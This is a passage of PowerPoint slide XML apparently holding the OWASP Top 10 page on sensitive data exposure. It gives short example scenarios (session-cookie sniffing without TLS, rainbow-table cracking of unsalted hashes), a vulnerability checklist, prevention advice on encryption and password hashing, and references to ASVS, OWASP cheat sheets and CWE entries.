              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A site simply doesn’t use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authenticated pages. An attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>simply monitors network traffic (like an open wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>), and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steals the user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session cookie. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>then replays this cookie and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hijacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session, accessing the user’s private data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: The password database uses unsalted hashes to store everyone’s passwords. A file upload flaw allows an attacker to retrieve the password database. All of the unsalted hashes can be exposed with a rainbow table of precalculated hashes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="35814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Am I Vulnerable to Data Exposure?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The first thing you have to determine is which data is sensitive enough to require extra protection. For example, passwords, credit card numbers, health records, and personal information should be protected. For all such data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is any of this data stored in clear text long term, including backups of this data?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is any of this data transmitted in clear text, internally or externally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Internet traffic is especially dangerous.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are any old / weak cryptographic algorithms used?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are weak crypto keys generated, or is proper key management or rotation missing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are any browser security directives or headers missing when sensitive data is provided by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sent to the browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>And more … For a more complete set of problems to avoid, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ASVS areas Crypto (V7), Data Prot (V9), and SSL/TLS (V10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347472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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For a more complete set of requirements, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ASVS req’ts on Cryptography (V7), Data Protection (V9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> Communications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Security (V10)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP Cryptographic Storage Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Password Storage Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Transport Layer Protection Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Testing Guide: Chapter on SSL/TLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId10"/>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11"/>
              </a:rPr>
              <a:t>CWE Entry 310 on Cryptographic Issues</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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12"/>
              </a:rPr>
              <a:t>CWE Entry 312 on Cleartext Storage of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="-57150">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>CWE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Entry 319 on Cleartext Transmission of Sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>CWE Entry 326 on Weak Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="35814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How Do I Prevent This?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The full perils of unsafe cryptography, SSL/TLS usage, and data protection are well beyond the scope of the Top 10. That said, for all sensitive data, do the following, at a minimum:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Considering the threats you plan to protect this data from (e.g., insider attack, external user), make sure you encrypt all sensitive data at rest and in transit in a manner that defends against these threats.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t retain can’t be stolen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure strong standard algorithms and strong keys are used, and proper key management is in place. Consider using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>FIPS 140 validated cryptographic modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are stored with an algorithm specifically designed for password protection, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>crypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>scrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disable autocomplete on forms requesting sensitive data and disable caching for pages that contain sensitive data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
